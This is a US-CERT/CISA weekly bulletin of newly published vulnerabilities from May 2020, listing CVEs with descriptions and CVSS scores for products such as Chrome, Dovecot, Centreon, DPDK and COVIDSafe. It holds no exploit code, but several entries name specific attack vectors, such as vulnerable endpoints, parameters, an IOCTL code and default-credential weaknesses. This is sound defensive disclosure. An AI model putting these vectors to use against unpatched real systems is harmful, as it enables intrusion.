Vulnerability Summary for the Week of May 18, 2020

US-CERT All NCAS Products - Mon, 05/25/2020 - 11:33
Original release date: May 25, 2020


The CISA Weekly Vulnerability Summary Bulletin is created using information from the NIST NVD. In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

 

High Vulnerabilities Primary
Vendor -- Product Description Published CVSS Score Source & Patch Info amd -- overdrive
  An issue was discovered in AODDriver2.sys in AMD OverDrive. The vulnerable driver exposes a wrmsr instruction via IOCTL 0x81112ee0 and does not properly filter the Model Specific Register (MSR). Allowing arbitrary MSR writes can lead to Ring-0 code execution and escalation of privileges. 2020-05-18 7.5 CVE-2019-7247
MISC centreon -- centreon
  Centreon before 19.04.15 allows remote attackers to execute arbitrary OS commands by placing shell metacharacters in RRDdatabase_status_path (via a main.get.php request) and then visiting the include/views/graphs/graphStatus/displayServiceStatus.php page. 2020-05-21 9 CVE-2020-13252
MISC
MISC
MISC
MISC cherokee_project -- cherokee
  In Cherokee through 1.2.104, remote attackers can trigger an out-of-bounds write in cherokee_handler_cgi_add_env_pair in handler_cgi.c by sending many request headers, as demonstrated by a GET request with many "Host: 127.0.0.1" headers. 2020-05-18 7.5 CVE-2019-20800
MISC
MISC covidsafe -- covidsafe
  OpenTrace, as used in COVIDSafe through v1.0.17, TraceTogether, ABTraceTogether, and other applications on iOS and Android, allows remote attackers to conduct long-term re-identification attacks and possibly have unspecified other impact, because of how Bluetooth is used. 2020-05-18 7.5 CVE-2020-12856
MISC
MISC
MISC d-link -- dap-1360_devices An issue was discovered on D-Link DAP-1360 revision F devices. Remote attackers can start a telnet service without authorization via an undocumented HTTP request. Although this is the primary vulnerability, the impact depends on the firmware version. Versions 609EU through 613EUbeta were tested. Versions through 6.12b01 have weak root credentials, allowing an attacker to gain remote root access. After 6.12b01, the root credentials were changed but the telnet service can still be started without authorization. 2020-05-15 10 CVE-2019-18666
MISC
MISC
MISC druva -- insync_windows_client
  Relative path traversal in Druva inSync Windows Client 6.6.3 allows a local, unauthenticated attacker to execute arbitrary operating system commands with SYSTEM privileges. 2020-05-21 7.2 CVE-2020-5752
MISC
MISC eq-3 -- homematic_ccu2_and_ccu3_devices
  eQ-3 Homematic Central Control Unit (CCU)2 through 2.51.6 and CCU3 through 3.51.6 allow Remote Code Execution in the JSON API Method ReGa.runScript, by unauthenticated attackers with access to the web interface, due to the default auto-login feature being enabled during first-time setup (or factory reset). 2020-05-15 7.5 CVE-2020-12834
MISC facebook -- proxygen
  A use-after-free is possible due to an error in lifetime management in the request adaptor when a malicious client invokes request error handling in a specific sequence. This issue affects versions of proxygen prior to v2020.05.18.00. 2020-05-18 7.5 CVE-2020-1897
CONFIRM freerdp -- freerdp
  libfreerdp/codec/planar.c in FreeRDP version > 1.0 through 2.0.0-rc4 has an Out-of-bounds Write. 2020-05-15 7.5 CVE-2020-11521
MISC
CONFIRM
CONFIRM ivanti -- workspace_control
  In Ivanti WorkSpace Control before 10.4.40.0, a user can elevate rights on the system by hijacking certain user registries. This is possible because pwrgrid.exe first checks the Current User registry hives (HKCU) when starting an application with elevated rights. 2020-05-18 7.2 CVE-2019-17066
CONFIRM logkitty -- logkitty
  Lack of output sanitization allowed an attack to execute arbitrary shell commands via the logkitty npm package before version 0.7.1. 2020-05-15 7.5 CVE-2020-8149
MISC mariadb -- connector/c libmariadb/mariadb_lib.c in MariaDB Connector/C before 3.1.8 does not properly validate the content of an OK packet received from a client. NOTE: although mariadb_lib.c was originally based on code shipped for MySQL, this issue does not affect any MySQL components supported by Oracle. 2020-05-20 7.5 CVE-2020-13249
MISC
MISC microsoft -- multiple_products
  A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. 2020-05-21 7.5 CVE-2020-0901
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists when the Windows fails to properly handle objects in memory, aka 'Microsoft Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1010, CVE-2020-1068. 2020-05-21 7.2 CVE-2020-1079
MISC microsoft -- multiple_windows_products A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1051, CVE-2020-1174, CVE-2020-1175. 2020-05-21 9.3 CVE-2020-1176
MISC microsoft -- multiple_windows_products
  A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1051, CVE-2020-1175, CVE-2020-1176. 2020-05-21 9.3 CVE-2020-1174
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in Windows Block Level Backup Engine Service (wbengine) that allows file deletion in arbitrary locations.To exploit the vulnerability, an attacker would first have to log on to the system, aka 'Microsoft Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1068, CVE-2020-1079. 2020-05-21 7.2 CVE-2020-1010
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations.To exploit the vulnerability, an attacker would first have to log on to the system, aka 'Microsoft Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1010, CVE-2020-1079. 2020-05-21 7.2 CVE-2020-1068
MISC microsoft -- multiple_windows_products
  A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1051, CVE-2020-1174, CVE-2020-1176. 2020-05-21 9.3 CVE-2020-1175
MISC microsoft -- multiple_windows_products
  A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1174, CVE-2020-1175, CVE-2020-1176. 2020-05-21 9.3 CVE-2020-1051
MISC microweber -- microweber
  Microweber 1.1.18 allows Unrestricted File Upload because admin/view:modules/load_module:users#edit-user=1 does not verify that the file extension (used with the Add Image option on the Edit User screen) corresponds to an image file. 2020-05-20 7.2 CVE-2020-13241
MISC mikrotik -- mikrotik-router-monitoring-system An issue was discovered in Mikrotik-Router-Monitoring-System through 2018-10-22. SQL Injection exists in check_community.php via the parameter community. 2020-05-16 7.5 CVE-2020-13118
MISC
MISC misp_project -- misp_maltego MISP MISP-maltego 1.4.4 incorrectly shares a MISP connection across users in a remote-transform use case. 2020-05-15 7.5 CVE-2020-12889
MISC mylittleteels -- mylittleadmin
  The management tool in MyLittleAdmin 3.8 allows remote attackers to execute arbitrary code because machineKey is hardcoded (the same for all customers' installations) in web.config, and can be used to send serialized ASP code. 2020-05-19 7.5 CVE-2020-13166
MISC
MISC netgear -- multiple_products
  An issue was discovered on NETGEAR Orbi Tri-Band Business WiFi Add-on Satellite (SRS60) AC3000 V2.5.1.106, Outdoor Satellite (RBS50Y) V2.5.1.106, and Pro Tri-Band Business WiFi Router (SRR60) AC3000 V2.5.1.106. The root account has the same password as the Web-admin component. Thus, by exploiting CVE-2020-11551, it is possible to achieve remote code execution with root privileges on the embedded Linux system. 2020-05-18 8.3 CVE-2020-11549
MISC
MISC
MISC netsweeper -- netsweeper
  Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters. 2020-05-19 7.5 CVE-2020-13167
MISC nintendo -- nintendo_64_devices
  Morita Shogi 64 through 2020-05-02 for Nintendo 64 devices allows remote attackers to execute arbitrary code via crafted packet data to the built-in modem because 0x800b3e94 (aka the IF subcommand to top-level command 7) has a stack-based buffer overflow. 2020-05-16 7.5 CVE-2020-13109
MISC
MISC oblac -- jodd
  Jodd before 5.0.4 performs Deserialization of Untrusted JSON Data when setClassMetadataName is set. 2020-05-21 7.5 CVE-2018-21234
MISC
MISC
MISC panasonic -- multiple_devices Panasonic P110, Eluga Z1 Pro, Eluga X1, and Eluga X1 Pro devices through 2020-04-10 have Insecure Permissions. NOTE: the vendor states that all affected products are at "End-of-software-support." 2020-05-20 7.5 CVE-2020-11716
CONFIRM panasonic -- p99_devices
  Panasonic P99 devices through 2020-04-10 have Incorrect Access Control. NOTE: the vendor states that all affected products are at "End-of-software-support." 2020-05-19 7.5 CVE-2020-11715
CONFIRM panasonic -- video_insight
  Video Insight VMS 7.5 and earlier allows remote attackers to conduct code injection attacks via unspecified vectors. 2020-05-20 7.5 CVE-2019-5997
MISC
MISC raonwiz -- k_upload
  In RAONWIZ K Upload v2018.0.2.51 and prior, automatic update processing without integrity check on update module(web.js) allows an attacker to modify arguments which causes downloading a random DLL and injection on it. 2020-05-21 7.5 CVE-2020-7808
CONFIRM smartbear -- readyapi_soapui_pro
  An issue was discovered in SmartBear ReadyAPI SoapUI Pro 3.2.5. Due to unsafe use of an Java RMI based protocol in an unsafe configuration, an attacker can inject malicious serialized objects into the communication, resulting in remote code execution in the context of a client-side Network Licensing Protocol component. 2020-05-20 7.5 CVE-2020-12835
MISC
FULLDISC
MISC
MISC stashcat -- stashcat
  An issue was discovered in the stashcat app through 3.9.1 for macOS, Windows, Android, iOS, and possibly other platforms. The GET method is used with client_key and device_id data in the query string, which allows attackers to obtain sensitive information by reading web-server logs. 2020-05-18 9 CVE-2020-13129
MISC
MISC tibco_software -- multiple_jproducts The administrative UI component of TIBCO Software Inc.'s TIBCO JasperReports Server, TIBCO JasperReports Server for AWS Marketplace, and TIBCO JasperReports Server for ActiveMatrix BPM contains a vulnerability that theoretically allows an unauthenticated attacker to obtain the permissions of a JasperReports Server "superuser" for the affected systems. The attacker can theoretically exploit the vulnerability consistently, remotely, and without authenticating. Affected releases are TIBCO Software Inc.'s TIBCO JasperReports Server: versions 7.1.1 and below, TIBCO JasperReports Server for AWS Marketplace: versions 7.1.1 and below, and TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.1.1 and below. 2020-05-20 10 CVE-2020-9409
CONFIRM vandyke -- securecrt
  SecureCRT before 8.7.2 allows remote attackers to execute arbitrary code via an Integer Overflow and a Buffer Overflow because a banner can trigger a line number to CSI functions that exceeds INT_MAX. 2020-05-15 10 CVE-2020-12651
MISC
MISC
CONFIRM
MISC wso2 -- api_manager
  WSO2 API Manager 3.0.0 does not properly restrict outbound network access from a Publisher node, opening up the possibility of SSRF to this node's entire intranet. 2020-05-20 7.5 CVE-2020-13226
MISC
MISC
MISC
MISC Back to top

 

Medium Vulnerabilities Primary
Vendor -- Product Description Published CVSS Score Source & Patch Info amd -- ati_diagnostics_hardware_sys/overclocking_utility
  An issue was discovered in atillk64.sys in AMD ATI Diagnostics Hardware Abstraction Sys/Overclocking Utility 5.11.9.0. The vulnerable driver exposes a wrmsr instruction and does not properly filter the Model Specific Register (MSR). Allowing arbitrary MSR writes can lead to Ring-0 code execution and escalation of privileges. 2020-05-18 4.6 CVE-2019-7246
MISC apache -- couchdb
  CouchDB version 3.0.0 shipped with a new configuration setting that governs access control to the entire database server called `require_valid_user_except_for_up`. It was meant as an extension to the long standing setting `require_valid_user`, which in turn requires that any and all requests to CouchDB will have to be made with valid credentials, effectively forbidding any anonymous requests. The new `require_valid_user_except_for_up` is an off-by-default setting that was meant to allow requiring valid credentials for all endpoints except for the `/_up` endpoint. However, the implementation of this made an error that lead to not enforcing credentials on any endpoint, when enabled. CouchDB versions 3.0.1[1] and 3.1.0[2] fix this issue. 2020-05-20 6.8 CVE-2020-1955
MISC apache -- tomcat
  When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed. 2020-05-20 6.8 CVE-2020-9484
SUSE
MLIST
MISC
MLIST
MLIST apt -- apt
  Missing input validation in the ar/tar implementations of APT before version 2.1.2 could result in denial of service when processing specially crafted deb files. 2020-05-15 4.3 CVE-2020-3810
MISC
MISC
MISC
MISC
MISC bitdefender -- bitdefender_engines Improper Input Validation vulnerability in the cevakrnl.rv0 module as used in the Bitdefender Engines allows an attacker to trigger a denial of service while scanning a specially-crafted sample. This issue affects: Bitdefender Bitdefender Engines versions prior to 7.84063. 2020-05-15 5 CVE-2020-8100
MISC bluetooth -- bluetooth_core_specification Legacy pairing and secure-connections pairing authentication in Bluetooth® BR/EDR Core Specification v5.2 and earlier may allow an unauthenticated user to complete authentication without pairing credentials via adjacent access. An unauthenticated, adjacent attacker could impersonate a Bluetooth BR/EDR master or slave to pair with a previously paired remote device to successfully complete the authentication procedure without knowing the link key. 2020-05-19 4.8 CVE-2020-10135
MISC
CERT-VN
CONFIRM bluetooth -- core
  Pairing in Bluetooth® Core v5.2 and earlier may permit an unauthenticated attacker to acquire credentials with two pairing devices via adjacent access when the unauthenticated user initiates different pairing methods in each peer device and an end-user erroneously completes both pairing procedures with the MITM using the confirmation number of one peer as the passkey of the other. An adjacent, unauthenticated attacker could be able to initiate any Bluetooth operation on either attacked device exposed by the enabled Bluetooth profiles. This exposure may be limited when the user must authorize certain access explicitly, but so long as a user assumes that it is the intended remote device requesting permissions, device-local protections may be weakened. 2020-05-19 4.3 CVE-2020-10134
CERT-VN
CONFIRM cacti -- cacti
  In Cacti before 1.2.11, disabling a user account does not immediately invalidate any permissions granted to that account (e.g., permission to view logs). 2020-05-20 4 CVE-2020-13230
MISC
MISC cacti -- cacti
  In Cacti before 1.2.11, auth_profile.php?action=edit allows CSRF for an admin email change. 2020-05-20 4.3 CVE-2020-13231
MISC
MISC cellebrite -- ufed
  Cellebrite UFED 5.0 to 7.5.0.845 implements local operating system policies that can be circumvented to obtain a command prompt via the Windows file dialog that is reachable via the Certificate-Based Authentication option of the Wireless Network Connection screen. 2020-05-15 4.6 CVE-2020-12798
MISC
MISC
MISC
MISC
MISC cherokee_project -- cherokee
  In Cherokee through 1.2.104, multiple memory corruption errors may be used by a remote attacker to destabilize the work of a server. 2020-05-18 5 CVE-2019-20799
MISC
MISC
MISC
MISC
MISC cherokee_project -- cherokee
  An XSS issue was discovered in handler_server_info.c in Cherokee through 1.2.104. The requested URL is improperly displayed on the About page in the default configuration of the web server and its administrator panel. The XSS in the administrator panel can be used to reconfigure the server and execute arbitrary commands. 2020-05-18 6 CVE-2019-20798
MISC
MISC covidsafe -- covidsafe
  Non-reinitialisation of random data in the advertising payload in COVIDSafe v1.0.15 and v1.0.16 allows a remote attacker to re-identify Android devices running COVIDSafe by scanning for their advertising beacons. 2020-05-18 5 CVE-2020-12858
MISC
MISC covidsafe -- covidsafe
  Caching of GATT characteristic values (TempID) in COVIDSafe v1.0.15 and v1.0.16 allows a remote attacker to long-term re-identify an Android device running COVIDSafe. 2020-05-18 5 CVE-2020-12857
MISC
MISC
MISC covidsafe -- covidsafe
  COVIDSafe through v1.0.17 allows a remote attacker to access phone name and model information because a BLE device can have four roles and COVIDSafe uses all of them. This allows for re-identification of a device, and potentially identification of the owner's name. 2020-05-18 5 CVE-2020-12860
MISC
MISC covidsafe -- covidsafe
  Unnecessary fields in the OpenTrace/BlueTrace protocol in COVIDSafe through v1.0.17 allow a remote attacker to identify a device model by observing cleartext payload data. This allows re-identification of devices, especially less common phone models or those in low-density situations. 2020-05-18 5 CVE-2020-12859
MISC
MISC d-link -- dsp-w215_devices D-Link DSP-W215 1.26b03 devices send an obfuscated hash that can be retrieved and understood by a network sniffer. 2020-05-18 5 CVE-2020-13136
MISC dell -- isilon
  Dell EMC Isilon versions 8.2.2 and earlier contain a remotesupport vulnerability. The pre-configured support account, remotesupport, is bundled in the Dell EMC Isilon OneFS installation. This account is used for diagnostics and other support functions. Although the default password is different for every cluster, it is predictable. 2020-05-20 5 CVE-2020-5365
MISC dell -- isilon_onefs Dell EMC Isilon OneFS versions 8.2.2 and earlier contain an SNMPv2 vulnerability. The SNMPv2 services is enabled, by default, with a pre-configured community string. This community string allows read-only access to many aspects of the Isilon cluster, some of which are considered sensitive and can foster additional access. 2020-05-20 5 CVE-2020-5364
MISC digi -- xbee_2_devices
  Digi XBee 2 devices do not have an effective protection mechanism against remote AT commands, because of issues related to the network stack upon which the ZigBee protocol is built. 2020-05-21 5.5 CVE-2017-18868
MISC dolibarr -- dolibarr
  The DMS/ECM module in Dolibarr 11.0.4 allows users with the 'Setup documents directories' permission to rename uploaded files to have insecure file extensions. This bypasses the .noexe protection mechanism against XSS. 2020-05-20 5.5 CVE-2020-13240
MISC dovecot -- dovecot
  In Dovecot before 2.3.10.1, unauthenticated sending of malformed parameters to a NOOP command causes a NULL Pointer Dereference and crash in submission-login, submission, or lmtp. 2020-05-18 5 CVE-2020-10957
MISC
FULLDISC
MLIST
MISC
FEDORA
UBUNTU
DEBIAN
CONFIRM dovecot -- dovecot
  In Dovecot before 2.3.10.1, a crafted SMTP/LMTP message triggers an unauthenticated use-after-free bug in submission-login, submission, or lmtp, and can lead to a crash under circumstances involving many newlines after a command. 2020-05-18 5 CVE-2020-10958
MISC
FULLDISC
MLIST
MISC
FEDORA
UBUNTU
DEBIAN
CONFIRM dovecot -- dovecot
  In Dovecot before 2.3.10.1, remote unauthenticated attackers can crash the lmtp or submission process by sending mail with an empty localpart. 2020-05-18 5 CVE-2020-10967
MISC
FULLDISC
MLIST
MISC
FEDORA
UBUNTU
DEBIAN
CONFIRM dpdk -- dpdk
  A memory corruption issue was found in DPDK versions 17.05 and above. This flaw is caused by an integer truncation on the index of a payload. Under certain circumstances, the index (a UInt) is copied and truncated into a uint16, which can lead to out of bound indexing and possible memory corruption. 2020-05-19 4.6 CVE-2020-10723
SUSE
MISC
CONFIRM
UBUNTU
MISC dpdk -- dpdk
  A vulnerability was found in DPDK versions 18.05 and above. A missing check for an integer overflow in vhost_user_set_log_base() could result in a smaller memory map than requested, possibly allowing memory corruption. 2020-05-19 4.6 CVE-2020-10722
SUSE
MISC
CONFIRM
UBUNTU
MISC dpdk -- dpdk
  A flaw was found in DPDK version 19.11 and above that allows a malicious guest to cause a segmentation fault of the vhost-user backend application running on the host, which could result in a loss of connectivity for the other guests running on that host. This is caused by a missing validity check of the descriptor address in the function `virtio_dev_rx_batch_packed()`. 2020-05-20 4 CVE-2020-10725
SUSE
MISC
CONFIRM
MISC e6y -- prboom-plus
  An issue was discovered in e6y prboom-plus 2.5.1.5. There is a buffer overflow in client and server code responsible for handling received UDP packets, as demonstrated by I_SendPacket or I_SendPacketTo in i_network.c. 2020-05-18 5 CVE-2019-20797
MISC
MISC
MISC edx -- open_edx_ironwood
  Studio in Open edX Ironwood 2.5, when CodeJail is not used, allows a user to go to the "Create New course>New section>New subsection>New unit>Add new component>Problem button>Advanced tab>Custom Python evaluated code" screen, edit the problem, and execute Python code. This leads to arbitrary code execution. 2020-05-18 6.5 CVE-2020-13144
MISC
MISC
MISC edx -- open_edx_ironwood
  Studio in Open edX Ironwood 2.5 allows CSV injection because an added cohort in Course>Instructor>Cohorts may contain a formula that is exported via the "Course>Data Downloads>Reports>Download profile info" feature. 2020-05-18 6.8 CVE-2020-13146
MISC em-imap -- em-imap
  em-imap 0.5 uses the library eventmachine in an insecure way that allows an attacker to perform a man-in-the-middle attack against users of the library. The hostname in a TLS server certificate is not verified. 2020-05-19 5.8 CVE-2020-13163
MISC estsoft -- alsong
  ALSong 3.46 and earlier version contain a Document Object Model (DOM) based cross-site scripting vulnerability caused by improper validation of user input. A remote attacker could exploit this vulnerability by tricking the victim to open ALSong Album(sab) file. 2020-05-15 4.3 CVE-2020-7809
MISC
MISC freerdp -- freerdp libfreerdp/cache/bitmap.c in FreeRDP versions > 1.0 through 2.0.0-rc4 has an Out of bounds read. 2020-05-15 6.4 CVE-2020-11525
MISC
CONFIRM
CONFIRM
CONFIRM gilacms -- gila_cms Gila CMS before 1.11.6 has reflected XSS via the admin/content/postcategory id parameter, which is mishandled for g_preview_theme. 2020-05-21 4.3 CVE-2019-20803
MISC gilacms -- gila_cms Gila CMS before 1.11.6 allows CSRF with resultant XSS via the admin/themes URI, leading to compromise of the admin account. 2020-05-21 6.8 CVE-2019-20804
MISC gitea -- gitea
  An issue was discovered in Gitea through 1.11.5. An attacker can trigger a deadlock by initiating a transfer of a repository's ownership from one organization to another. 2020-05-20 5 CVE-2020-13246
MISC
MISC
MISC google -- chrome Insufficient policy enforcement in tab strip in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension. 2020-05-21 4.3 CVE-2020-6476
MISC
MISC google -- chrome Inappropriate implementation in full screen in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to spoof security UI via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6478
MISC
MISC google -- chrome Insufficient policy enforcement in payments in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6483
MISC
MISC google -- chrome Inappropriate implementation in sharing in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to spoof security UI via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6479
MISC
MISC google -- chrome Insufficient policy enforcement in downloads in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6487
MISC
MISC google -- chrome Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. 2020-05-21 6.8 CVE-2020-6471
MISC
MISC google -- chrome Inappropriate implementation in installer in Google Chrome on OS X prior to 83.0.4103.61 allowed a local attacker to perform privilege escalation via a crafted file. 2020-05-21 6.8 CVE-2020-6477
MISC
MISC google -- chrome Inappropriate implementation in developer tools in Google Chrome prior to 83.0.4103.61 allowed a remote attacker who had convinced the user to take certain actions in developer tools to obtain potentially sensitive information from disk via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6489
MISC
MISC google -- chrome Insufficient policy enforcement in downloads in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6488
MISC
MISC google -- chrome
  Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension. 2020-05-21 4.3 CVE-2020-6482
MISC
MISC google -- chrome
  Insufficient data validation in ChromeDriver in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted request. 2020-05-21 4.3 CVE-2020-6484
MISC
MISC google -- chrome
  Insufficient data validation in media router in Google Chrome prior to 83.0.4103.61 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6485
MISC
MISC google -- chrome
  Insufficient policy enforcement in navigations in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6486
MISC
MISC google -- chrome
  Insufficient data validation in loader in Google Chrome prior to 83.0.4103.61 allowed a remote attacker who had been able to write to disk to leak cross-origin data via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6490
MISC
MISC google -- chrome
  Use after free in speech recognizer in Google Chrome prior to 81.0.4044.113 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6457
MISC
MISC google -- chrome
  Insufficient data validation in site information in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to spoof security UI via a crafted domain name. 2020-05-21 4.3 CVE-2020-6491
MISC
MISC google -- chrome
  Use after free in payments in Google Chrome prior to 81.0.4044.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6459
MISC
MISC google -- chrome
  Use after free in Blink in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6474
MISC
MISC google -- chrome
  Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. 2020-05-21 6.8 CVE-2020-6469
MISC
MISC google -- chrome
  Use after free in WebRTC in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6467
MISC
MISC google -- chrome
  Use after free in media in Google Chrome prior to 83.0.4103.61 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6466
MISC
MISC google -- chrome
  Use after free in reader mode in Google Chrome on Android prior to 83.0.4103.61 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6465
MISC
MISC google -- chrome
  Insufficient policy enforcement in Blink in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6473
MISC
MISC google -- chrome
  Insufficient data validation in URL formatting in Google Chrome prior to 81.0.4044.122 allowed a remote attacker to perform domain spoofing via a crafted domain name. 2020-05-21 4.3 CVE-2020-6460
MISC
MISC google -- chrome
  Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information from process memory or disk via a crafted Chrome Extension. 2020-05-21 4.3 CVE-2020-6472
MISC
MISC google -- chrome
  Insufficient validation of untrusted input in clipboard in Google Chrome prior to 83.0.4103.61 allowed a local attacker to inject arbitrary scripts or HTML (UXSS) via crafted clipboard contents. 2020-05-21 4.3 CVE-2020-6470
MISC
MISC google -- chrome
  Type confusion in Blink in Google Chrome prior to 81.0.4044.138 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6464
SUSE
MISC
MISC google -- chrome
  Incorrect implementation in full screen in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to spoof security UI via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6475
MISC
MISC google -- chrome
  Insufficient policy enforcement in URL formatting in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to perform domain spoofing via a crafted domain name. 2020-05-21 4.3 CVE-2020-6481
MISC
MISC google -- chrome
  Type confusion in V8 in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6468
MISC
MISC google -- chrome
  Out of bounds read and write in PDFium in Google Chrome prior to 81.0.4044.122 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. 2020-05-21 6.8 CVE-2020-6458
MISC
MISC google -- chrome
  Use after free in storage in Google Chrome prior to 81.0.4044.129 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6461
MISC
MISC google -- chrome
  Use after free in task scheduling in Google Chrome prior to 81.0.4044.129 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6462
MISC
MISC google -- chrome
  Use after free in ANGLE in Google Chrome prior to 81.0.4044.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6463
MISC
MISC gwtupload -- gwtupload
  An issue was discovered in Manolo GWTUpload 1.0.3. server/UploadServlet.java (the servlet for handling file upload) accepts a delay parameter that causes a thread to sleep. It can be abused to cause all of a server's threads to sleep, leading to denial of service. 2020-05-18 5 CVE-2020-13128
MISC
MISC hive_solutions -- netius
  netius prior to 1.17.58 is vulnerable to HTTP Request Smuggling. HTTP pipelining issues and request smuggling attacks might be possible due to incorrect Transfer encoding header parsing which could allow for CL:TE or TE:TE attacks. 2020-05-21 4.3 CVE-2020-7655
MISC horde -- gollem
  Gollem before 3.0.13, as used in Horde Groupware Webmail Edition 5.2.22 and other products, is affected by a reflected Cross-Site Scripting (XSS) vulnerability via the HTTP GET dir parameter in the browser functionality, affecting breadcrumb output. An attacker can obtain access to a victim's webmail account by making them visit a malicious URL. 2020-05-18 4.3 CVE-2020-8034
CONFIRM
MISC
MISC
CONFIRM horde -- groupware_webmail_edition The image view functionality in Horde Groupware Webmail Edition before 5.2.22 is affected by a stored Cross-Site Scripting (XSS) vulnerability via an SVG image upload containing a JavaScript payload. An attacker can obtain access to a victim's webmail account by making them visit a malicious URL. 2020-05-18 4.3 CVE-2020-8035
CONFIRM
CONFIRM hp -- nimble_storage
  Potential remote code execution security vulnerabilities have been identified with HPE Nimble Storage systems that could be exploited by an attacker to gain elevated privileges on the array. The following NimbleOS versions, and all subsequent releases, contain a software fix for this vulnerability: 3.9.3.0 4.5.6.0 5.0.9.0 5.1.4.100 2020-05-19 6.5 CVE-2020-7138
MISC hp -- nimbleos
  Potential remote access security vulnerabilities have been identified with HPE Nimble Storage systems that could be exploited by an attacker to access and modify sensitive information on the system. The following NimbleOS versions, and all subsequent releases, contain a software fix for this vulnerability: 3.9.3.0 4.5.6.0 5.0.9.0 5.1.4.100 2020-05-19 5.5 CVE-2020-7139
MISC hp -- superdome_flex_server
  A validation issue in HPE Superdome Flex's RMC component may allow local elevation of privilege. Apply HPE Superdome Flex Server version 3.25.46 or later to resolve this issue. 2020-05-19 4.6 CVE-2020-7137
